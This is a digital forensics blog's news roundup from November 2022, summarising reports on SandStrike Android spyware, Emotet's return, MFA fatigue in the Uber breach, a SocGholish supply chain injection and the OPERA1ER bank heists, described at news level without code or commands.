AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 11/04/2022

New SandStrike spyware targets Android users with booby-trapped VPN application

To lure victims into downloading the spyware implants, adversaries set up Facebook and Instagram accounts with more than 1,000 followers and designed attractive religious-themed graphic materials, setting up an effective trap for adherents of this belief. Most of these social media accounts contain a link to a Telegram channel also created by the attacker. In this channel, the actor behind SandStrike distributed a seemingly harmless VPN application to access sites banned in certain regions, for example, religious-related materials. To make this application fully functional, adversaries also set up their own VPN infrastructure. However, the VPN client contains fully-functioning spyware with capabilities allowing threat actors to collect and steal sensitive data, including call logs, contact lists, and also track any further activities of persecuted individuals.

Emotet botnet starts blasting malware again after 5 month break

The Emotet malware operation is again spamming malicious emails after almost a five-month “vacation” that saw little activity from the notorious cybercrime operation. Emotet is a malware infection distributed through phishing campaigns containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL will be downloaded and loaded into memory. Once loaded, the malware will search for and steal emails to use in future spam campaigns and drop additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.

Multi-factor auth fatigue is real – and it’s why you might be in the headlines next

The September cyberattack on ride-hailing service Uber began when a criminal bought the stolen credentials of a company contractor on the dark web. The miscreant then repeatedly tried to log into the contractor’s Uber account, triggering the two-factor login approval request that the contractor initially denied, blocking access. However, eventually the contractor accepted one of many push notifications, enabling the attacker to log into the account and get access to Uber’s corporate network, systems, and data. The app maker became the latest high-profile victim of multi-factor authentication (MFA) fatigue, an ever growing cybersecurity problem in which attackers are able to work their way around a cornerstone of modern defenses at a time when threat groups are shifting their focus away from infecting endpoints and instead are targeting identity.

More than 250 US news sites inject malware in possible supply chain attack

Researchers at Proofpoint disclosed in a Tweet Wednesday that more than 250 U.S. news organizations have accessed malicious SocGholish malware in what could potentially become a very dangerous supply chain attack. In the Tweet, Proofpoint said it observed intermittent injections on a media company that serves video and advertising services to many major news outlets. The targeted media company serves content via Javascript to its partners, and by modifying the codebase of this otherwise benign Javascript, the threat actors used the media company to deploy the SocGholish malware.

French-speaking voleurs stole $30m in 15-country bank, telecoms cyber-heist spree

A French-speaking criminal group codenamed OPERA1ER has pulled off more than 30 cyber-heists against telecom organizations and banks across Africa, Asia, and Latin America, stealing upwards of $30 million over four years, according to security researchers. The robberies start with targeted emails that trick staff at these businesses into running backdoor malware, keyloggers, and password stealers, according to Group-IB’s threat intel team, working with French telecom company Orange’s CERT Coordination Center. Crooks use the stolen credentials from these software nasties to gain admin-level credentials to Windows domain controllers on the network and banks’ back-end applications such as their SWIFT messaging clients, which financial institutions use to send and receive details of transactions from one another. 

Related Posts